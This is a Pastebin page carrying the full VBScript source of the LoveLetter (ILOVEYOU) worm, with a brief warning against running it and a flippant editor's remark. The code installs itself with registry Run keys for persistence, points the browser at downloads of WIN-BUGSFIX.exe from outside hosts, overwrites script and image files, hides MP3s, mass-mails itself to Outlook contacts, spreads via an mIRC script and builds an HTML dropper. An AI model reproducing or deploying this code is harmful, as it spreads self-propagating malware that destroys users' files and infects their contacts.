API tools faq
paste
Advertisement
NeoHr

Loveletter virus source code

NeoHr
Apr 6th, 2015
540
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 10.80 KB | None | 0 0
raw download clone embed print report
  1. Below is the text of the pathetic LoveLetter "virus", for anyone who's interested. It has been reformatted as an plain text/HTML file, so there's no need to worry about being infected by it. For God's sake, don't copy the text into a .VBS file and run it, espescially if you have installed any new MSIE (this little bugger will wipe out your MP3s!!)
  2.  
  3. Editor's note: If you're going to write a virus, use a REAL language (assembler)!! Maybe C if you're desperate...
  4.  
  5.  
  6.  rem  barok -loveletter(vbe) <i hate go to school>
  7.  rem by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /  Manila,Philippines
  8.  On Error Resume Next
  9.  dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
  10.  eq=""
  11.  ctr=0
  12.  Set fso = CreateObject("Scripting.FileSystemObject")
  13.  set file = fso.OpenTextFile(WScript.ScriptFullname,1)
  14.  vbscopy=file.ReadAll
  15.  main()
  16.  sub main()
  17.  On Error Resume Next
  18.  dim wscr,rr
  19.  set wscr=CreateObject("WScript.Shell")
  20.  rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
  21.  if (rr>=1) then
  22.  wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
  23.  end if
  24.  Set dirwin = fso.GetSpecialFolder(0)
  25.  Set dirsystem = fso.GetSpecialFolder(1)
  26.  Set dirtemp = fso.GetSpecialFolder(2)
  27.  Set c = fso.GetFile(WScript.ScriptFullName)
  28.  c.Copy(dirsystem&"\MSKernel32.vbs")
  29.  c.Copy(dirwin&"\Win32DLL.vbs")
  30.  c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  31.  regruns()
  32.  html()
  33.  spreadtoemail()
  34.  listadriv()
  35.  end sub
  36.  sub regruns()
  37.  On Error Resume Next
  38.  Dim num,downread
  39.  regcreate
  40.  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs"
  41.  regcreate
  42.  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs"
  43.  downread=""
  44.  downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
  45.  if (downread="") then
  46.  downread="c:\"
  47.  end if
  48.  if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
  49.  Randomize
  50.  num = Int((4 * Rnd) + 1)
  51.  if num = 1 then
  52.  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  53. Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
  54. hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
  55.  elseif num = 2 then
  56.  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
  57. erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
  58.  elseif num = 3 then
  59.  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  60. Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
  61. QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
  62.  elseif num = 4 then
  63.  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  64. Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
  65. GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe"
  66.  end if
  67.  end if
  68.  if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate
  69.  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe"
  70.  regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
  71. Explorer\Main\Start Page","about:blank"
  72.  end if
  73.  end sub
  74.  sub listadriv
  75.  On Error Resume Next
  76.  Dim d,dc,s
  77.  Set dc = fso.Drives
  78.  For Each d in dc
  79.  If d.DriveType = 2 or d.DriveType=3 Then
  80.  folderlist(d.path&"\")
  81.  end if
  82.  Next
  83.  listadriv = s
  84.  end sub
  85.  sub infectfiles(folderspec)
  86.  On Error Resume Next
  87.  dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
  88.  set f = fso.GetFolder(folderspec)
  89.  set fc = f.Files
  90.  for each f1 in fc
  91.  ext=fso.GetExtensionName(f1.path)
  92.  ext=lcase(ext)
  93.  s=lcase(f1.name)
  94.  if (ext="vbs") or (ext="vbe") then
  95.  set ap=fso.OpenTextFile(f1.path,2,true)
  96.  ap.write vbscopy
  97.  ap.close
  98.  elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
  99.  set ap=fso.OpenTextFile(f1.path,2,true)
  100.  ap.write vbscopy
  101.  ap.close
  102.  bname=fso.GetBaseName(f1.path)
  103.  set cop=fso.GetFile(f1.path)
  104.  cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)
  105.  elseif(ext="jpg") or (ext="jpeg") then
  106.  set ap=fso.OpenTextFile(f1.path,2,true)
  107.  ap.write vbscopy
  108.  ap.close
  109.  set cop=fso.GetFile(f1.path)
  110.  cop.copy(f1.path&".vbs")
  111.  fso.DeleteFile(f1.path)
  112.  elseif(ext="mp3") or (ext="mp2") then
  113.  set mp3=fso.CreateTextFile(f1.path&".vbs")
  114.  mp3.write vbscopy
  115.  mp3.close
  116.  set att=fso.GetFile(f1.path)
  117.  att.attributes=att.attributes+2
  118.  end if
  119.  if (eq<>folderspec) then
  120.  if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
  121.  set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]"
  122.  scriptini.WriteLine ";mIRC Script"
  123.  scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
  124.  scriptini.WriteLine "    corrupt... WINDOWS will affect and will not run correctly. thanks"
  125.  scriptini.WriteLine ";"
  126.  scriptini.WriteLine ";Khaled Mardam-Bey"
  127.  scriptini.WriteLine ";http://www.mirc.com"
  128.  scriptini.WriteLine ";"
  129.  scriptini.WriteLine "n0=on 1:JOIN:#:{"
  130.  scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2=  /.dcc send $nick
  131. "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
  132.  scriptini.WriteLine "n3=}"
  133.  scriptini.close
  134.  eq=folderspec
  135.  end if
  136.  end if
  137.  next
  138.  end sub
  139.  sub folderlist(folderspec)
  140.  On Error Resume Next
  141.  dim f,f1,sf
  142.  set f = fso.GetFolder(folderspec)
  143.  set sf = f.SubFolders
  144.  for each f1 in sf
  145.  infectfiles(f1.path)
  146.  folderlist(f1.path)
  147.  next
  148.  end sub
  149.  sub regcreate(regkey,regvalue)
  150.  Set regedit = CreateObject("WScript.Shell")
  151.  regedit.RegWrite regkey,regvalue
  152.  end sub
  153.  function regget(value)
  154.  Set regedit = CreateObject("WScript.Shell")
  155.  regget=regedit.RegRead(value)
  156.  end function
  157.  function fileexist(filespec)
  158.  On Error Resume Next
  159.  dim msg
  160.  if (fso.FileExists(filespec)) Then
  161.  msg = 0
  162.  else
  163.  msg = 1
  164.  end if
  165.  fileexist = msg
  166.  end function
  167.  function folderexist(folderspec)
  168.  On Error Resume Next
  169.  dim msg
  170.  if (fso.GetFolderExists(folderspec)) then
  171.  msg = 0
  172.  else
  173.  msg = 1
  174.  end if
  175.  fileexist = msg
  176.  end function
  177.  sub spreadtoemail()
  178.  On Error Resume Next
  179.  dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  180.  set regedit=CreateObject("WScript.Shell")
  181.  set out=WScript.CreateObject("Outlook.Application")
  182.  set mapi=out.GetNameSpace("MAPI")
  183.  for ctrlists=1 to mapi.AddressLists.Count
  184.  set a=mapi.AddressLists(ctrlists)
  185.  x=1
  186.  regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then
  187.  regv=1
  188.  end if
  189.  if (int(a.AddressEntries.Count)>int(regv)) then
  190.  for ctrentries=1 to a.AddressEntries.Count
  191.  malead=a.AddressEntries(x)
  192.  regad=""
  193.  regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead )
  194.  if (regad="") then
  195.  set male=out.CreateItem(0)
  196.  male.Recipients.Add(malead)
  197.  male.Subject = "ILOVEYOU"
  198.  male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
  199.  male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send
  200.  regedit.RegWrite
  201.  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if
  202.  x=x+1
  203.  next
  204.  regedit.RegWrite
  205.  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else
  206.  regedit.RegWrite
  207.  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if
  208.  next
  209.  Set out=Nothing
  210.  Set mapi=Nothing
  211.  end sub
  212.  sub html
  213.  On Error Resume Next
  214.  dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
  215.  dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
  216. LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
  217. @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@
  218. CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
  219.  "<?-?HEAD><BODY
  220. ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
  221. HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
  222.  "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@
  223. BGPROPERTIES=@-@fixed@-@
  224. BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
  225.  "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to
  226. Enable ActiveX<?-?p>"&vbcrlf& _
  227.  "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
  228. BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _
  229.  "<?-?BODY><?-?HTML>"&vbcrlf& _
  230.  "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _
  231.  "if (window.screen){var wi=screen.availWidth;var
  232. hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _
  233.  "?-??-?-->"&vbcrlf& _
  234.  "<?-?SCRIPT>"&vbcrlf& _
  235.  "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _
  236.  "on error resume next"&vbcrlf& _
  237.  "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _
  238.  "code="
  239.  dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
  240.  "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
  241.  "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set
  242. wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
  243.  "wri.write code4"&vbcrlf& _
  244.  "wri.close"&vbcrlf& _
  245.  "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _
  246.  "aw=0"&vbcrlf& _
  247.  "end if"&vbcrlf& _
  248.  "if (aw=1) then"&vbcrlf& _
  249.  "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _
  250.  "end if"&vbcrlf& _
  251.  "end if"&vbcrlf& _
  252.  "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
  253.  "regedit.RegWrite
  254. @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
  255. -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _
  256.  "<?-?SCRIPT>"
  257.  dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
  258.  dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
  259.  dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
  260.  dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
  261.  dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
  262.  dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
  263.  set fso=CreateObject("Scripting.FileSystemObject")
  264.  set c=fso.OpenTextFile(WScript.ScriptFullName,1)
  265.  lines=Split(c.ReadAll,vbcrlf)
  266.  l1=ubound(lines)
  267.  for n=0 to ubound(lines)
  268.  lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
  269.  lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then
  270.  lines(n)=chr(34)+lines(n)+chr(34)
  271.  else
  272.  lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if
  273.  next
  274.  set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close
  275.  set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5
  276.  d.write join(lines,vbcrlf)
  277.  d.write vbcrlf
  278.  d.write dt6
  279.  d.close
  280.  end sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!